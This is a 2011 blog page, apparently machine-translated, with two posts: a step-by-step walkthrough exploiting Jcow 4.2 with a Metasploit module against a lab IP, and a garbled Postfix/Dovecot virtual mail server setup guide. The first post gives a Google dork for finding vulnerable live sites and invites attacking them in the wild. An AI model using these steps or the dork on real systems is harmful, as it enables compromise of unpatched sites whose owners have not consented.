Friday, September 16, 2011

Hacking Jcow Webserver Social Networking

2 komentar
Do your friends ever see the CMS on this one? Jcow social networking ... Yes, it was the name ... Jcow offer web-based applications for social networking site for free alias free and can be viewed at their website jcow.net with a fairly small file size is only 777KB of not more than 1 MB.
Jcow
But here I will discuss is not about the use of the Jcow this as a friendship site, but the presence of a vulnerability of some version of Jcow which turned out to be compromised in just 4 steps , And even the intruder can see the contents of the victim web server directory (if it turns out the server did not implement good security).
In the example I will make below, using the victim's IP: 192.168.8.94 ...
Much better if my friends want to learn using a virtual lab first, but if it's curious to direct to the wild arena, folks can also search via google dork: "Powered by Jcow 4.2.0". If you are interested to go directly to the real world, my friends also have to learn the logic of the attack techniques via the internet ( click here )
OS Attacker: BT 5 R1
Victim OS: XP SP3
Vulnerable applications: Jcow 4.2
In my previous article has also been made username: "victim and the password:" victim "in the application Jcow target.
Okay we start step by step below
Needs:
1. Metasploit Framework (metasploit.com)
2. Jcow.rb exploit script ( mediafire link on the website of origin )
The steps:
1. Copy the file jcow.rb exploits that have been downloaded into the folder / pentest / exploits / framework / modules / exploits / remote /
jcow.rb cp / pentest / exploits / framework / modules / exploits / remote /
If confused how to copy my files into Backtrack Linux exploit.rb, folks can see the tutorial here .
2. Open msfconsole metasploit console by typing in a terminal, then use the previous exploits that we copied earlier.
msf> use exploit / remote / Jcow
3. Next type the command show switch options to see what can be used to exploit this.

msf exploit (Jcow)> set rhost 192.168.8.94 -> IP target
rhost => 192.168.8.94
msf exploit (Jcow)> set username victim -> sets the username
username => victim
msf exploit (Jcow)> set password victim -> set password
password => victim
4. Yep after everything is done properly configured, the last step just run the command on the console metasploit exploit.

Succeed
Security:
1. Upgrade to the latest version Jcow
Continue reading →

Create a Virtual Domain Mail Server in Ubuntu

0 komentar

This time we will create a Mail Server with Ubuntu 9.10

apache2, mysql, postfix, dovecot, squirellmail main weapon :)
Postfix is ​​a mail sender program instead of sendmail.
Postfix is a free and open-source mail transfer agent (MTA) That routes and delivers electronic mail.
It is intended as a fast, Easier-to-administer, and secure alternative to the widely-used Sendmail MTA. ( wiki )
Dovecot is an open source IMAP and POP3 server for Linux / UNIX-like systems, written primarily with security in mind. Developed by Timo Sirainen, Dovecot was first released in July 2002. Dovecot primarily AIMS to be a lightweight, fast and easy to set up an open source mailserver. ( wiki )
1. Preparation system for Ubuntu 9.10
So that later it would not have broken the system was installed ubuntu baek to build essential
sudo apt-get install build-essential

2. Install the main file

sudo apt-get install postfix postfix-mSQL php5-imap dovecot-pop3d dovecot-imapd
apache2 php5-mysql squirrelmail

3. System checks whether the apache2 postfix and dovecot ny already exist yet disystem

apache2 service status & & service postfix status & & service dovecot status

4. Create Database For Postfix

 root @ kaitokid: ~ # mysql-u root-p / /-p mysql passwd enter its 
 mysql> create database postfix; mysql> grant all privileges on postfix .* to 'postfix' @ 'localhost' IDENTIFIED BY 'postfixpassword'; mysql> grant all privileges on postfix .* to 'postfix' @ '127 .0.0.1 'IDENTIFIED BY 'postfixpassword'; mysql> exit 
 / / Replace 'postfixpasswd' corresponding password in want & 'postfix'
      according to the user that chill 

5. Download postfixadmin to simplify the administration of mail

 http://sourceforge.net/projects/postfixadmin/ 

6. Extract the downloaded postfixadmin and move it to / var / www

 root @ kaitokid: ~ # cd / var / www / root @ kaitokid: / var / www # tar xzf / home/kaitokid/postfixadmin-2 .**. kaitokid tar.gz root @: / var / www # mv-postfixadmin 2 .** / postfix root @ kaitokid: / var / www # chown-R www-data.www-data / var / www 

7. Setup config.inc.php postfixadmin

root @ kaitokid: ~ # nano / var / www / postfix / config.inc.php
 / / Database Config
    / / Mysql = MySQL 3.23 and 4.0
    / / Mysqli = MySQL 4.1
    / / Pgsql = PostgreSQL
   $ CONF ['database_type'] = 'mysqli'; / / customize it to mysql sql dg series 4 and above use mysqli
   $ CONF ['database_host'] = 'localhost';
   $ CONF ['database_user'] = 'postfix'; / / user database in mysql see number 4
   $ CONF ['database_password'] = 'postfixpassword'; / / user database mysql see number 4
   $ CONF ['database_name'] = 'postfix'; $ CONF ['database_prefix'] =''; / / default is empty 

8. Setup postfix admin

open your web browser firefox and then open the URL
http://127.0.0.1/postfix/setup.php
/ / Installation time to ensure that no errors & to ppostfixadmin series 2.3 setup files do not need to be removed
/ / Make sure the web server on the computer already road

9. MySQL Postfix Configuration

/ / Configuration of user & passwd in keeping with the number 4
 nano / etc / postfix / mysql_virtual_alias_maps.cf
     user = postfix
     password = postfixpassword
     hosts = 127.0.0.1
     dbname = postfix
     table = alias
     select_field = goto
     where_field = address 
 nano / etc / postfix / mysql_virtual_mailbox_maps.cf
     user = postfix
     password = postfixpassword
     hosts = 127.0.0.1
     dbname = postfix
     table = mailbox
     select_field = maildir
     where_field = username
     # Additional_conditions = and active = '1 ' 
 nano / etc / postfix / mysql_virtual_mailbox_limit_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = mailbox
    select_field = quota
    where_field = username
    # Additional_conditions = and active = '1 '

 nano / etc / postfix / mysql_virtual_domains_maps.cf
   user = postfix
   password = postfixpassword
   hosts = 127.0.0.1
   dbname = postfix
   table = domain
   select_field = domain
   where_field = domain
   # Additional_conditions = and backupmx = '0 'and active = '1'

 nano / etc / postfix / mysql_relay_domains_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = domain
    select_field = domain
    where_field = domain
    # Additional_conditions = and backupmx = '1 ' 
 chgrp postfix / etc / postfix / mysql_ *. cf
   chmod 640 / etc / postfix / mysql_ *. cf
   groupadd-g 5000 vmail
   useradd-m-g vmail-u 5000-d / home / vmail-s / bin / bash vmail 

10. postfix configuration main.cf

 nano / etc / postfix / main.cf
    # Virtual Mailbox Domains Settings
   / / Default configuration in main.cf to wait for part 2 opreknya mail server 

   myhostname = ubuntu / / adjust dg computer hostname used mail server
   virtual_alias_maps = mysql: / etc / postfix / mysql_virtual_alias_maps.cf
   virtual_mailbox_domains = mysql: / etc / postfix / mysql_virtual_domains_maps.cf
   virtual_mailbox_maps = mysql: / etc / postfix / mysql_virtual_mailbox_maps.cf
   virtual_mailbox_limit = 51200000
   virtual_uid_maps = static: 5000
   virtual_gid_maps = static: 5000
   the virtual = / home / vmail
   virtual_transport = virtual

    # Additional for quota support
   virtual_create_maildirsize = yes
   virtual_mailbox_extended = yes
   virtual_mailbox_limit_maps = mysql: / etc / postfix / mysql_virtual_mailbox_limit_maps.cf
   virtual_mailbox_limit_override = yes
   virtual_maildir_limit_message = Sorry, the maildir has overdrawn your diskspace your
                        quota, please free up some of spaces of your mailbox try again.
   virtual_overquota_bounce = yes
   alias_maps = hash: / etc / aliases
   alias_database = hash: / etc / aliases
   mydestination =
   relayhost =
   mynetworks = 127.0.0.0 / 8 [:: ffff: 127.0.0.0] / 104 [:: 1] / 128
   mailbox_size_limit = 0
   recipient_delimiter = +
   inet_interfaces = all 
11. Configuring Dovecot POP3 and IMAP4
 nano / etc / dovecot / dovecot.conf
    protocols = imap pop3
    disable_plaintext_auth = no
    default_mail_env = maildir: / home / vmail /% u /
    first_valid_uid = 5000
    first_valid_gid = 5000
    # SQL database
     passdb sql {
    # Path for SQL configuration file
    args = / etc / dovecot / dovecot-sql.conf
    }
    # SQL database
    userDB sql {
    # Path for SQL configuration file
    args = / etc / dovecot / dovecot-sql.conf
    } 
 nano / etc / dovecot / dovecot-sql.conf
    driver = mysql
    connect = host = 127.0.0.1 dbname = postfix user = postfix password = postfixpassword
    default_pass_scheme = CRYPT
    USER_QUERY = SELECT maildir, 5000 AS uid, 5000 AS gid FROM mailbox WHERE username = '% u'
    password_query = SELECT password FROM mailbox WHERE username = '% u' 
ok till here first mailing and happy happy ubuntu :)
Continue reading →